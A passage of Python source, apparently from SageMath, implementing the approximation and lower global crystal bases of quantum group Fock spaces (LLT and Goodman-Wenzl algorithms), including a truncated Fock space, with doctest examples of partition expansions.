"""
P = self.parent()
R = P.realization_of()
q = R._q
d = self.monomial_coefficients(copy=True)
for la in d:
d[la] *= q**-sum(1 for x in la.cells()
if la.content(*x, multicharge=R._multicharge) == 0)
return P._from_dict(d, coerce=False)
natural = F
class A(CombinatorialFreeModule, BindableClass):
r"""
The `A` basis of the Fock space which is the approximation
of the lower global crystal basis.
The approximation basis `A` is a basis that is constructed
from the highest weight element by applying divided
difference operators using the ladder construction of
[LLT1996]_ and [GW1999]_. Thus, this basis is bar invariant
and upper unitriangular (using dominance order on partitions)
when expressed in the natural basis. This basis is then
converted to the lower global crystal basis by using
Gaussian elimination.
EXAMPLES:
We construct Example 6.5 and 6.7 in [LLT1996]_::
sage: FS = FockSpace(2)
sage: F = FS.natural()
sage: G = FS.G()
sage: A = FS.A()
sage: F(A[5])
|5> + |3, 2> + 2*q*|3, 1, 1> + q^2*|2, 2, 1> + q^2*|1, 1, 1, 1, 1>
sage: F(A[4,1])
|4, 1> + q*|2, 1, 1, 1>
sage: F(A[3,2])
|3, 2> + q*|3, 1, 1> + q^2*|2, 2, 1>
sage: F(G[5])
|5> + q*|3, 1, 1> + q^2*|1, 1, 1, 1, 1>
We construct the examples in Section 5.1 of [Fayers2010]_::
sage: FS = FockSpace(2, [0, 0])
sage: F = FS.natural()
sage: A = FS.A()
sage: F(A[[2,1],[1]])
|[2, 1], [1]> + q*|[2], [2]> + q^2*|[2], [1, 1]> + q^2*|[1, 1], [2]>
+ q^3*|[1, 1], [1, 1]> + q^4*|[1], [2, 1]>
sage: F(A[[4],[]])
|[4], []> + q*|[3, 1], []> + q*|[2, 1, 1], []>
+ (q^2+1)*|[2, 1], [1]> + 2*q*|[2], [2]> + 2*q^2*|[2], [1, 1]>
+ q^2*|[1, 1, 1, 1], []> + 2*q^2*|[1, 1], [2]>
+ 2*q^3*|[1, 1], [1, 1]> + (q^4+q^2)*|[1], [2, 1]>
+ q^2*|[], [4]> + q^3*|[], [3, 1]> + q^3*|[], [2, 1, 1]>
+ q^4*|[], [1, 1, 1, 1]>
"""
def __init__(self, F):
r"""
Initialize ``self``.
EXAMPLES::
sage: A = FockSpace(2).A()
sage: TestSuite(A).run()
"""
self._basis_name = "approximation"
indices = PartitionTuples(level=len(F._multicharge),
regular=F._n)
CombinatorialFreeModule.__init__(self, F.base_ring(), indices,
prefix='A', bracket=False,
sorting_reverse=True,
category=FockSpaceBases(F))
self.module_morphism(self._A_to_fock_basis,
triangular='upper', unitriangular=True,
codomain=F.natural()).register_as_coercion()
options = FockSpaceOptions
@cached_method
def _A_to_fock_basis(self, la):
r"""
Return the `A` basis indexed by ``la`` in the natural basis.
EXAMPLES::
sage: A = FockSpace(3).A()
sage: A._A_to_fock_basis(Partition([3]))
|3> + q*|2, 1>
sage: A._A_to_fock_basis(Partition([2,1]))
|2, 1> + q*|1, 1, 1>
sage: FS = FockSpace(2, [0,1])
sage: F = FS.natural()
sage: A = FS.A()
sage: F(A[[],[1]])
|[], [1]>
"""
R = self.realization_of()
fock = R.natural()
if la.size() == 0:
return fock.highest_weight_vector()
if len(R._multicharge) > 1:
# Find one more than the first non-empty partition
k = 1
for p in la:
if p.size() != 0:
break
k += 1
# Reduce down to the lower level Fock space and do the computation
# and then lift back up to us by prepending empty partitions
if k == len(R._multicharge): # This means we get the empty partition
cur = fock.highest_weight_vector()
else:
F = FockSpace(R._n, R._multicharge[k:], R._q, R.base_ring())
Gp = F.G()
if k + 1 == len(R._multicharge):
cur = Gp._G_to_fock_basis(Gp._indices(la[k]))
cur = fock.sum_of_terms((fock._indices([[]]*k + [p]), c)
for p,c in cur)
else:
cur = Gp._G_to_fock_basis(Gp._indices(la[k:]))
cur = fock.sum_of_terms((fock._indices([[]]*k + list(pt)), c)
for pt,c in cur)
la = la[k-1]
r = R._multicharge[k-1]
else:
cur = fock.highest_weight_vector()
r = R._multicharge[0]
# Get the ladders and apply it to the current element
corners = la.corners()
cells = set(la.cells())
q = R._q
k = R._n - 1 # This is sl_{k+1}
b = ZZ.zero()
# While there is some cell left to count
while any(c[1]*k + c[0] >= b for c in corners):
power = 0
i = -b + r # This will be converted to a mod n number
for x in range(b // k + 1):
if (b-x*k, x) in cells:
power += 1
cur = cur.f(i)
cur /= q_factorial(power, q)
b += 1
return cur
approximation = A
class G(CombinatorialFreeModule, BindableClass):
r"""
The lower global crystal basis living inside of Fock space.
EXAMPLES:
We construct some of the tables/entries given in Section 10
of [LLT1996]_. For `\widehat{\mathfrak{sl}}_2`::
sage: FS = FockSpace(2)
sage: F = FS.natural()
sage: G = FS.G()
sage: F(G[2])
|2> + q*|1, 1>
sage: F(G[3])
|3> + q*|1, 1, 1>
sage: F(G[2,1])
|2, 1>
sage: F(G[4])
|4> + q*|3, 1> + q*|2, 1, 1> + q^2*|1, 1, 1, 1>
sage: F(G[3,1])
|3, 1> + q*|2, 2> + q^2*|2, 1, 1>
sage: F(G[5])
|5> + q*|3, 1, 1> + q^2*|1, 1, 1, 1, 1>
sage: F(G[4,2])
|4, 2> + q*|4, 1, 1> + q*|3, 3> + q^2*|3, 1, 1, 1>
+ q^2*|2, 2, 2> + q^3*|2, 2, 1, 1>
sage: F(G[4,2,1])
|4, 2, 1> + q*|3, 3, 1> + q^2*|3, 2, 2> + q^3*|3, 2, 1, 1>
sage: F(G[6,2])
|6, 2> + q*|6, 1, 1> + q*|5, 3> + q^2*|5, 1, 1, 1> + q*|4, 3, 1>
+ q^2*|4, 2, 2> + (q^3+q)*|4, 2, 1, 1> + q^2*|4, 1, 1, 1, 1>
+ q^2*|3, 3, 1, 1> + q^3*|3, 2, 2, 1> + q^3*|3, 1, 1, 1, 1, 1>
+ q^3*|2, 2, 2, 1, 1> + q^4*|2, 2, 1, 1, 1, 1>
sage: F(G[5,3,1])
|5, 3, 1> + q*|5, 2, 2> + q^2*|5, 2, 1, 1> + q*|4, 4, 1>
+ q^2*|4, 2, 1, 1, 1> + q^2*|3, 3, 3> + q^3*|3, 3, 1, 1, 1>
+ q^3*|3, 2, 2, 2> + q^4*|3, 2, 2, 1, 1>
sage: F(G[4,3,2,1])
|4, 3, 2, 1>
sage: F(G[7,2,1])
|7, 2, 1> + q*|5, 2, 1, 1, 1> + q^2*|3, 2, 1, 1, 1, 1, 1>
sage: F(G[10,1])
|10, 1> + q*|8, 1, 1, 1> + q^2*|6, 1, 1, 1, 1, 1>
+ q^3*|4, 1, 1, 1, 1, 1, 1, 1>
+ q^4*|2, 1, 1, 1, 1, 1, 1, 1, 1, 1>
sage: F(G[6,3,2])
|6, 3, 2> + q*|6, 3, 1, 1> + q^2*|6, 2, 2, 1> + q^3*|5, 3, 2, 1>
+ q*|4, 3, 2, 1, 1> + q^2*|4, 3, 1, 1, 1, 1>
+ q^3*|4, 2, 2, 1, 1, 1> + q^4*|3, 3, 2, 1, 1, 1>
sage: F(G[5,3,2,1])
|5, 3, 2, 1> + q*|4, 4, 2, 1> + q^2*|4, 3, 3, 1>
+ q^3*|4, 3, 2, 2> + q^4*|4, 3, 2, 1, 1>
For `\widehat{\mathfrak{sl}}_3`::
sage: FS = FockSpace(3)
sage: F = FS.natural()
sage: G = FS.G()
sage: F(G[2])
|2>
sage: F(G[1,1])
|1, 1>
sage: F(G[3])
|3> + q*|2, 1>
sage: F(G[2,1])
|2, 1> + q*|1, 1, 1>
sage: F(G[4])
|4> + q*|2, 2>
sage: F(G[3,1])
|3, 1>
sage: F(G[2,2])
|2, 2> + q*|1, 1, 1, 1>
sage: F(G[2,1,1])
|2, 1, 1>
sage: F(G[5])
|5> + q*|2, 2, 1>
sage: F(G[2,2,1])
|2, 2, 1> + q*|2, 1, 1, 1>
sage: F(G[4,1,1])
|4, 1, 1> + q*|3, 2, 1> + q^2*|3, 1, 1, 1>
sage: F(G[5,2])
|5, 2> + q*|4, 3> + q^2*|4, 2, 1>
sage: F(G[8])
|8> + q*|5, 2, 1> + q*|3, 3, 1, 1> + q^2*|2, 2, 2, 2>
sage: F(G[7,2])
|7, 2> + q*|4, 2, 2, 1>
sage: F(G[6,2,2])
|6, 2, 2> + q*|6, 1, 1, 1, 1> + q*|4, 4, 2> + q^2*|3, 3, 2, 1, 1>
For `\widehat{\mathfrak{sl}}_4`::
sage: FS = FockSpace(4)
sage: F = FS.natural()
sage: G = FS.G()
sage: F(G[4])
|4> + q*|3, 1>
sage: F(G[3,1])
|3, 1> + q*|2, 1, 1>
sage: F(G[2,2])
|2, 2>
sage: F(G[2,1,1])
|2, 1, 1> + q*|1, 1, 1, 1>
sage: F(G[3,2])
|3, 2> + q*|2, 2, 1>
sage: F(G[2,2,2])
|2, 2, 2> + q*|1, 1, 1, 1, 1, 1>
sage: F(G[6,1])
|6, 1> + q*|4, 3>
sage: F(G[3,2,2,1])
|3, 2, 2, 1> + q*|3, 1, 1, 1, 1, 1> + q*|2, 2, 2, 2>
+ q^2*|2, 1, 1, 1, 1, 1, 1>
sage: F(G[7,2])
|7, 2> + q*|6, 2, 1> + q*|5, 4> + q^2*|5, 3, 1>
sage: F(G[5,2,2,1])
|5, 2, 2, 1> + q*|5, 1, 1, 1, 1, 1> + q*|4, 2, 2, 1, 1>
+ q^2*|4, 2, 1, 1, 1, 1>
We construct the examples in Section 5.1 of [Fayers2010]_::
sage: FS = FockSpace(2, [0, 0])
sage: F = FS.natural()
sage: G = FS.G()
sage: F(G[[2,1],[1]])
|[2, 1], [1]> + q*|[2], [2]> + q^2*|[2], [1, 1]>
+ q^2*|[1, 1], [2]> + q^3*|[1, 1], [1, 1]> + q^4*|[1], [2, 1]>
sage: F(G[[4],[]])
|[4], []> + q*|[3, 1], []> + q*|[2, 1, 1], []> + q^2*|[2, 1], [1]>
+ q*|[2], [2]> + q^2*|[2], [1, 1]> + q^2*|[1, 1, 1, 1], []>
+ q^2*|[1, 1], [2]> + q^3*|[1, 1], [1, 1]> + q^2*|[1], [2, 1]>
+ q^2*|[], [4]> + q^3*|[], [3, 1]> + q^3*|[], [2, 1, 1]>
+ q^4*|[], [1, 1, 1, 1]>
"""
def __init__(self, F):
r"""
Initialize ``self``.
EXAMPLES::
sage: G = FockSpace(2).G()
sage: TestSuite(G).run()
"""
self._basis_name = "lower global crystal"
indices = PartitionTuples(level=len(F._multicharge),
regular=F._n)
CombinatorialFreeModule.__init__(self, F.base_ring(), indices,
prefix='G', bracket=False,
sorting_reverse=True,
category=FockSpaceBases(F))
self.module_morphism(self._G_to_fock_basis,
triangular='upper', unitriangular=True,
codomain=F.natural()).register_as_coercion()
options = FockSpaceOptions
@cached_method
def _G_to_fock_basis(self, la):
r"""
Return the `G` basis indexed by ``la`` in the natural basis.
EXAMPLES::
sage: G = FockSpace(3).G()
sage: G._G_to_fock_basis(Partition([3]))
|3> + q*|2, 1>
sage: G._G_to_fock_basis(Partition([2,1]))
|2, 1> + q*|1, 1, 1>
"""
# Special case for the empty partition
if la.size() == 0:
return self.realization_of().natural().highest_weight_vector()
# Special case for empty leading partitions
R = self.realization_of()
if len(R._multicharge) > 1 and la[0].size() == 0:
fock = R.natural()
# Find the first non-empty partition
k = 0
for p in la:
if p.size() != 0:
break
k += 1
# Reduce down to the lower level Fock space and do the computation
# and then lift back up by prepending empty partitions
# Note that this will never be for the empty partition, which
# is already taken care of
F = FockSpace(R._n, R._multicharge[k:], R._q, R.base_ring())
Gp = F.G()
if k + 1 == len(R._multicharge):
cur = Gp._G_to_fock_basis(Gp._indices(la[k]))
return fock.sum_of_terms((fock._indices([[]]*k + [p]), c) for p,c in cur)
cur = Gp._G_to_fock_basis(Gp._indices(la[k:]))
return fock.sum_of_terms((fock._indices([[]]*k + list(pt)), c) for pt,c in cur)
cur = R.A()._A_to_fock_basis(la)
s = cur.support()
s.sort() # Sort lex, which respects dominance order
s.pop() # Remove the largest
q = R._q
while s:
mu = s.pop()
d = cur[mu].denominator()
k = d.degree()
n = cur[mu].numerator()
if k != 0 or n.constant_coefficient() != 0:
gamma = sum(n[i] * (q**(i-k) + q**(k-i))
for i in range(min(n.degree(), k)))
gamma += n[k]
cur -= gamma * self._G_to_fock_basis(mu)
# Add any new support elements
for x in cur.support():
if x == mu or not mu.dominates(x): # Add only things (strictly) dominated by mu
continue
for i in reversed(range(len(s))):
if not s[i].dominates(x):
s.insert(i+1, x)
break
return cur
lower_global_crystal = G
canonical = G
###############################################################################
## Bases Category
class FockSpaceBases(Category_realization_of_parent):
r"""
The category of bases of a (truncated) Fock space.
"""
def __init__(self, base):
r"""
Initialize the bases of a Fock space.
INPUT:
- ``base`` -- a Fock space
TESTS::
sage: from sage.algebras.quantum_groups.fock_space import FockSpaceBases
sage: F = FockSpace(2)
sage: bases = FockSpaceBases(F)
sage: TestSuite(bases).run()
"""
Category_realization_of_parent.__init__(self, base)
def _repr_(self):
r"""
Return the representation of ``self``.
EXAMPLES::
sage: from sage.algebras.quantum_groups.fock_space import FockSpaceBases
sage: F = FockSpace(2)
sage: FockSpaceBases(F)
Category of bases of Fock space of rank 2 of multicharge (0,) over
Fraction Field of Univariate Polynomial Ring in q over Integer Ring
"""
return "Category of bases of {}".format(self.base())
def super_categories(self):
r"""
The super categories of ``self``.
EXAMPLES::
sage: from sage.algebras.quantum_groups.fock_space import FockSpaceBases
sage: F = FockSpace(2)
sage: bases = FockSpaceBases(F)
sage: bases.super_categories()
[Category of vector spaces with basis over Fraction Field
of Univariate Polynomial Ring in q over Integer Ring,
Category of realizations of Fock space of rank 2 of multicharge (0,)
over Fraction Field of Univariate Polynomial Ring in q over Integer Ring]
"""
return [ModulesWithBasis(self.base().base_ring()), Realizations(self.base())]
class ParentMethods:
def _repr_(self):
r"""
Text representation of this basis of Fock space.
EXAMPLES::
sage: FS = FockSpace(2)
sage: FS.A()
Fock space of rank 2 of multicharge (0,) over Fraction Field of
Univariate Polynomial Ring in q over Integer Ring
in the approximation basis
sage: FS.G()
Fock space of rank 2 of multicharge (0,) over Fraction Field of
Univariate Polynomial Ring in q over Integer Ring
in the lower global crystal basis
"""
return "{} in the {} basis".format(self.realization_of(), self._basis_name)
def some_elements(self):
r"""
Return some elements of ``self``.
EXAMPLES::
sage: F = FockSpace(3).natural()
sage: F.some_elements()[::13]
[3*|2> + 2*|1> + 2*|>,
|5>,
|3, 1, 1, 1>,
|3, 2, 2>,
|5, 1, 1, 1>,
|2, 2, 1, 1, 1, 1>,
|5, 2, 1, 1>,
|3, 2, 1, 1, 1, 1>]
sage: F = FockSpace(3, [0,1]).natural()
sage: F.some_elements()[::13]
[2*|[1], []> + 4*|[], [1]> + |[], []>,
|[1, 1], [1]>,
|[1, 1, 1], [1]>,
|[5], []>,
|[3], [1, 1]>,
|[1], [2, 2]>,
|[4, 1, 1], []>,
|[2, 1, 1, 1], [1]>]
"""
others = [self.monomial(la) for la in self.basis().keys().some_elements()]
return [self.an_element()] + others
def q(self):
r"""
Return the parameter `q` of ``self``.
EXAMPLES::
sage: FS = FockSpace(2)
sage: A = FS.A()
sage: A.q()
q
sage: FS = FockSpace(2, q=-1)
sage: G = FS.G()
sage: G.q()
-1
"""
return self.realization_of()._q
def multicharge(self):
r"""
Return the multicharge of ``self``.
EXAMPLES::
sage: FS = FockSpace(4)
sage: A = FS.A()
sage: A.multicharge()
(0,)
sage: FS = FockSpace(4, [1,0,2])
sage: G = FS.G()
sage: G.multicharge()
(1, 0, 2)
"""
return self.realization_of()._multicharge
@cached_method
def highest_weight_vector(self):
r"""
Return the highest weight vector of ``self``.
EXAMPLES::
sage: FS = FockSpace(2)
sage: F = FS.natural()
sage: F.highest_weight_vector()
|>
sage: A = FS.A()
sage: A.highest_weight_vector()
A[]
sage: G = FS.G()
sage: G.highest_weight_vector()
G[]
"""
level = len(self.realization_of()._multicharge)
if level == 1:
return self.monomial(self._indices([]))
return self.monomial(self._indices([[]]*level))
def __getitem__(self, i):
r"""
Return the basis element indexed by ``i``.
INPUT:
- ``i`` -- a partition
EXAMPLES::
sage: F = FockSpace(3)
sage: A = F.A()
sage: A[[]]
A[]
sage: A[4]
A[4]
sage: A[2,2,1]
A[2, 2, 1]
sage: G = F.G()
sage: G[[]]
G[]
sage: G[4]
G[4]
sage: G[2,2,1]
G[2, 2, 1]
For higher levels::
sage: F = FockSpace(2, [0, 0])
sage: G = F.G()
sage: G[[2,1],[1]]
G([2, 1], [1])
TESTS::
sage: F = FockSpace(3)
sage: A = F.A()
sage: A[2,2,2,1]
Traceback (most recent call last):
...
ValueError: [2, 2, 2, 1] is not an element of 3-Regular Partitions
sage: F = FockSpace(3, [0, 0])
sage: A = F.A()
sage: A[[], [2,2,2,1]]
Traceback (most recent call last):
...
ValueError: [[], [2, 2, 2, 1]] is not a 3-Regular partition tuples of level 2
"""
if i in ZZ:
i = [i]
i = self._indices(i)
if i.size() == 0:
return self.highest_weight_vector()
return self.monomial(i)
###############################################################################
## Truncated Fock space
class FockSpaceTruncated(FockSpace):
r"""
This is the Fock space given by partitions of length no more than `k`.
This can be formed as the quotient `\mathcal{F} / \mathcal{F}_k`,
where `\mathcal{F}_k` is the submodule spanned by all diagrams
of length (strictly) more than `k`.
We have three bases:
- The natural basis indexed by truncated `n`-regular partitions:
:class:`~sage.algebras.quantum_groups.fock_space.FockSpaceTruncated.F`.
- The approximation basis that comes from LLT(-type) algorithms:
:class:`~sage.algebras.quantum_groups.fock_space.FockSpaceTruncated.A`.
- The lower global crystal basis:
:class:`~sage.algebras.quantum_groups.fock_space.FockSpaceTruncated.G`.
.. SEEALSO::
:class:`FockSpace`
EXAMPLES::
sage: F = FockSpace(2, truncated=2)
sage: mg = F.highest_weight_vector()
sage: mg.f(0)
|1>
sage: mg.f(0).f(1)
|2> + q*|1, 1>
sage: mg.f(0).f(1).f(0)
|3>
Compare this to the full Fock space::
sage: F = FockSpace(2)
sage: mg = F.highest_weight_vector()
sage: mg.f(0).f(1).f(0)
|3> + q*|1, 1, 1>
REFERENCES:
- [GW1999]_
"""
@staticmethod
def __classcall_private__(cls, n, k, q=None, base_ring=None):
r"""
Standardize input to ensure a unique representation.
EXAMPLES::
sage: R.<q> = ZZ[]
sage: F1 = FockSpace(3, truncated=2)
sage: F2 = FockSpace(3, q=q, truncated=2)
sage: F3 = FockSpace(3, q=q, base_ring=R, truncated=2)
sage: F1 is F2 and F2 is F3
True
sage: from sage.algebras.quantum_groups.fock_space import FockSpaceTruncated
sage: F4 = FockSpaceTruncated(3, 2, q, R)
sage: F1 is F4
True
"""
if q is None:
base_ring = PolynomialRing(ZZ, 'q')
q = base_ring.gen(0)
if base_ring is None:
base_ring = q.parent()
base_ring = FractionField(base_ring)
q = base_ring(q)
return super(FockSpace, cls).__classcall__(cls, n, k, q, base_ring)
def __init__(self, n, k, q, base_ring):
r"""
Initialize ``self``.
EXAMPLES::
sage: F = FockSpace(2, truncated=3)
sage: TestSuite(F).run()
"""
M = IntegerModRing(n)
self._k = k
FockSpace.__init__(self, n, (M(0),), q, base_ring)
def _repr_(self):
r"""
Return a string representation of ``self``.
EXAMPLES::
sage: FockSpace(2, truncated=3)
Fock space of rank 2 truncated at 3 over Fraction Field of
Univariate Polynomial Ring in q over Integer Ring
"""
return "Fock space of rank {} truncated at {} over {}".format(self._n, self._k, self.base_ring())
class F(CombinatorialFreeModule, BindableClass):
r"""
The natural basis of the truncated Fock space.
This is the natural basis of the full Fock space projected
onto the truncated Fock space. It inherits the
`U_q(\widehat{\widetilde{sl}}_n)`-action from the action
on the full Fock space.
EXAMPLES::
sage: FS = FockSpace(4)
sage: F = FS.natural()
sage: FS3 = FockSpace(4, truncated=3)
sage: F3 = FS3.natural()
sage: u = F.highest_weight_vector()
sage: u3 = F3.highest_weight_vector()
sage: u3.f(0,3,2,1)
|2, 1, 1>
sage: u.f(0,3,2,1)
|2, 1, 1> + q*|1, 1, 1, 1>
sage: u.f(0,3,2,1,1)
((q^2+1)/q)*|2, 1, 1, 1>
sage: u3.f(0,3,2,1,1)
0
"""
def __init__(self, F):
r"""
Initialize ``self``.
EXAMPLES::
sage: F = FockSpace(2, truncated=3).natural()
sage: TestSuite(F).run() # long time
"""
self._basis_name = "natural"
# If the cell x is above the cell y
if len(F._multicharge) == 1: # For partitions
self._above = lambda x,y: x[0] < y[0]
else: # For partition tuples
self._above = lambda x,y: x[0] < y[0] or (x[0] == y[0] and x[1] < y[1])
self._addable = lambda la,i: [x for x in la.outside_corners()
if la.content(*x, multicharge=F._multicharge) == i]
self._removable = lambda la,i: [x for x in la.corners()
if la.content(*x, multicharge=F._multicharge) == i]
indices = Partitions(F._n, max_length=F._k)
CombinatorialFreeModule.__init__(self, F.base_ring(), indices,
prefix='', bracket=['|', '>'],
latex_bracket=['\\lvert', '\\rangle'],
sorting_reverse=True,
category=FockSpaceBases(F))
options = FockSpaceOptions
def _repr_term(self, m):
r"""
Return a representation of the monomial indexed by ``m``.
EXAMPLES::
sage: F = FockSpace(2, truncated=3).natural()
sage: F._repr_term(Partition([2,1,1]))
'|2, 1, 1>'
sage: F.highest_weight_vector()
|>
"""
return '|' + repr(m)[1:-1] + ">" # Strip the outer brackets of m
class Element(FockSpace.natural.Element):
r"""
An element in the truncated Fock space.
"""
def _f(self, i):
r"""
Apply the action of `f_i` on ``self``.
EXAMPLES::
sage: F = FockSpace(2, truncated=3).natural()
sage: mg = F.highest_weight_vector()
sage: mg.f(0)
|1>
sage: mg.f(0,1)
|2> + q*|1, 1>
sage: mg.f(0,1,0)
|3> + q*|1, 1, 1>
sage: mg.f(0,1,0,0)
0
sage: mg.f(0,1,0,1)
|4> + q*|3, 1> + q*|2, 1, 1>
sage: mg.f(0,1,0,1,0)
|5> + |3, 2> + 2*q*|3, 1, 1> + q^2*|2, 2, 1>
"""
P = self.parent()
def N_right(la, x, i):
return (sum(1 for y in P._addable(la, i) if P._above(y, x))
- sum(1 for y in P._removable(la, i) if P._above(y, x)))
q = P.realization_of()._q
k = P.realization_of()._k
return P.sum_of_terms([(la.add_cell(*x), c * q**N_right(la, x, i))
for la,c in self for x in P._addable(la, i)
if x[0] < k])
natural = F
class A(CombinatorialFreeModule, BindableClass):
r"""
The `A` basis of the Fock space, which is the approximation
basis of the lower global crystal basis.
INPUT:
- ``algorithm`` -- (default ``'GW'``) the algorithm to use when
computing this basis in the Fock space; the possible values are:
* ``'GW'`` -- use the algorithm given by Goodman and Wenzl
in [GW1999]_
* ``'LLT'`` -- use the LLT algorithm given in [LLT1996]_
.. NOTE::
The bases produced by the two algorithms are not the same
in general.
EXAMPLES::
sage: FS = FockSpace(5, truncated=4)
sage: F = FS.natural()
sage: A = FS.A()
We demonstrate that they are different bases, but both algorithms
still compute the basis `G`::
sage: A2 = FS.A('LLT')
sage: G = FS.G()
sage: F(A[12,9])
|12, 9> + q*|12, 4, 4, 1> + q*|8, 8, 5> + (q^2+1)*|8, 8, 4, 1>
sage: F(A2[12,9])
|12, 9> + q*|12, 4, 4, 1> + q*|8, 8, 5> + (q^2+2)*|8, 8, 4, 1>
sage: G._G_to_fock_basis(Partition([12,9]), 'GW')
|12, 9> + q*|12, 4, 4, 1> + q*|8, 8, 5> + q^2*|8, 8, 4, 1>
sage: G._G_to_fock_basis(Partition([12,9]), 'LLT')
|12, 9> + q*|12, 4, 4, 1> + q*|8, 8, 5> + q^2*|8, 8, 4, 1>
"""
def __init__(self, F, algorithm='GW'):
r"""
Initialize ``self``.
EXAMPLES::
sage: FS = FockSpace(2, truncated=3)
sage: A = FS.A()
sage: TestSuite(A).run()
sage: A2 = FS.A('LLT')
sage: TestSuite(A2).run()
"""
self._basis_name = "approximation"
if algorithm not in ['GW', 'LLT']:
raise ValueError("invalid algorithm")
self._alg = algorithm
indices = RegularPartitions_truncated(F._n, F._k)
CombinatorialFreeModule.__init__(self, F.base_ring(), indices,
prefix='A', bracket=False,
sorting_reverse=True,
category=FockSpaceBases(F))
self.module_morphism(self._A_to_fock_basis,
triangular='upper', unitriangular=True,
codomain=F.natural()).register_as_coercion()
options = FockSpaceOptions
@cached_method
def _LLT(self, la):
r"""
Return the result from the regular LLT algorithm on the partition
``la`` to compute the `A`-basis element in the corresponding
Fock space.
EXAMPLES::
sage: FS = FockSpace(5, truncated=4)
sage: F = FS.natural()
sage: A = FS.A()
sage: F(A[12,9])
|12, 9> + q*|12, 4, 4, 1> + q*|8, 8, 5> + (q^2+1)*|8, 8, 4, 1>
sage: A._LLT(Partition([12,9]))
|12, 9> + q*|12, 4, 4, 1> + q*|8, 8, 5> + (q^2+2)*|8, 8, 4, 1>
"""
R = self.realization_of()
fock = R.natural()
k = R._k
cur = fock.highest_weight_vector()
# Get the ladders and apply it to the current element
corners = la.corners()
cells = set(la.cells())
q = R._q
k = R._n - 1 # This is sl_{k+1}
r = R._multicharge[0]
b = ZZ.zero()
while any(c[1]*k + c[0] >= b for c in corners): # While there is some cell left to count
power = 0
i = -b + r # This will be converted to a mod n number
for x in range(b // k + 1):
if (b-x*k, x) in cells:
power += 1
cur = cur.f(i)
cur /= q_factorial(power, q)
b += 1
return cur
def _skew_tableau(self, cur, nu, d):
r"""
Return the action of the skew tableaux formed from ``nu`` by
applying the ``d`` fundamental weights.
EXAMPLES::
sage: FS = FockSpace(3, truncated=3)
sage: F = FS.natural()
sage: A = FS.A()
sage: G = FS.G()
sage: sk = A._skew_tableau(F(G[6,3]), Partition([6,3]), [1,1]); sk
|8, 4> + q*|8, 2, 2> + q*|7, 4, 1> + q^2*|7, 3, 2> + q*|6, 6>
+ q^2*|6, 5, 1> + q^2*|5, 4, 3> + q^3*|4, 4, 4>
sage: sk == F(A[8,4])
True
"""
R = self.realization_of()
last = None
power = 0
q = R._q
for i in reversed(range(len(d))):
for dummy in range(d[i]):
for j in range(i+1):
col = nu[j] if j < len(nu) else 0
res = nu.content(j, col, multicharge=R._multicharge)
if res != last:
cur /= q_factorial(power, q)
power = 1
last = res
else:
power += 1
cur = cur.f(res)
nu = nu.add_cell(j, col)
return cur / q_factorial(power, q)
@cached_method
def _A_to_fock_basis(self, la):
r"""
Return the `A` basis indexed by ``la`` in the natural basis.
EXAMPLES::
sage: FS = FockSpace(2, truncated=3)
sage: F = FS.natural()
sage: A = FS.A()
sage: A._A_to_fock_basis(Partition([2,1]))
|2, 1>
sage: F(A[3,1])
|3, 1> + q*|2, 2> + q^2*|2, 1, 1>
sage: A._A_to_fock_basis(Partition([3]))
|3> + q*|1, 1, 1>
sage: FS = FockSpace(2, truncated=5)
sage: F = FS.natural()
sage: A = FS.A()
sage: F(A[7,4,3])
|7, 4, 3> + q*|7, 4, 1, 1, 1> + q^2*|7, 2, 2, 2, 1> + |5, 4, 3, 2>
+ 2*q*|5, 4, 3, 1, 1> + 2*q^2*|5, 4, 2, 2, 1>
+ 2*q^3*|5, 3, 3, 2, 1> + q^4*|4, 4, 3, 2, 1>
sage: F(A[7,4,3,2])
|7, 4, 3, 2> + q*|7, 4, 3, 1, 1> + q^2*|7, 4, 2, 2, 1>
+ q^3*|7, 3, 3, 2, 1> + q^4*|6, 4, 3, 2, 1>
"""
if self._alg == 'LLT':
return self._LLT(la)
# Otherwise we use the GW algorithm
fock = self.realization_of().natural()
k = self.realization_of()._k
# We do some special cases first
# For the empty partition
if la.size() == 0:
return fock.highest_weight_vector()
# For length k partitions
if len(la) == k:
G = self.realization_of().G()
return G._G_to_fock_basis(la)
# For critical partitions
n = self.realization_of()._n
if len(la) == k-1 and all((la[i] - la[i+1] + 1) % n == 0 for i in range(k-2)) \
and (la[-1] + 1) % n == 0:
return fock.monomial(la)
# For interior partitions
shifted = [la[i] - (n - 1)*(k - 1 - i) for i in range(len(la))]
if len(la) == k - 1 and shifted in _Partitions:
# Construct the d's and the critical partition
d = [(la[i] - la[i+1] + 1) % n for i in range(len(la)-1)]
d.append((la[-1] + 1) % n)
crit = list(la)
for i,d_i in enumerate(d):
for j in range(i+1):
crit[j] -= d_i
nu = fock._indices(crit)
return self._skew_tableau(fock.monomial(nu), nu, d)
# For non-interior partitions
# Construct the d's and the partition ``a``
a = list(la) + [0]*(k - 1 - len(la)) # Add 0's to get the correct length
a = [a[i] + (k - 1 - i) for i in range(k-1)] # Shift the diagram
#shifted = list(a) # Make a copy of the shifted partition in case we need it later
d = [(a[i] - a[i+1]) % n for i in range(k-2)]
d.append(a[-1] % n)
for i,d_i in enumerate(d):
for j in range(i+1):
a[j] -= d_i
if sum(a) == 0: # a is contained in the fundamental box
return self._LLT(la)
p = list(a) # Make a copy that we can change
for i in range(k-2):
if a[i] - a[i+1] == 0:
d[i] -= 1
for j in range(i+1):
p[j] += 1
if a[-1] == 0:
d[-1] -= 1
for j in range(k-1):
p[j] += 1
p = [p[i] - (k - 1 - i) for i in range(k-1)]
I = self._indices
nu = I(p)
while not max(nu.to_exp()) < n:
# It is not regular, so we need to find the first regular
# partition after adding columns
while d[-1] == 0:
d.pop()
for j in range(d[-1]):
p[j] += 1
nu = I(p)
if la == nu:
j = -1
for i in range(k-2):
if p[i] - p[i+1] == 0:
j = -2
break
if p[i] > n and p[i] - p[i+1] > n:
j = i
if j != -2 and p[-1] > n:
j = k - 1
if j < 0:
return self._LLT(la)
G = self.realization_of().G()
nu = I([p[i] - n if i <= j else p[i] for i in range(k-1)])
d = [0]*j + [n]
return self._skew_tableau(G._G_to_fock_basis(nu), nu, d)
G = self.realization_of().G()
return self._skew_tableau(G._G_to_fock_basis(nu), nu, d)
approximation = A
class G(CombinatorialFreeModule, BindableClass):
r"""
The lower global crystal basis living inside of a
truncated Fock space.
EXAMPLES::
sage: FS = FockSpace(4, truncated=2)
sage: F = FS.natural()
sage: G = FS.G()
sage: F(G[3,1])
|3, 1>
sage: F(G[6,2])
|6, 2> + q*|5, 3>
sage: F(G[14])
|14> + q*|11, 3>
sage: FS = FockSpace(3, truncated=4)
sage: F = FS.natural()
sage: G = FS.G()
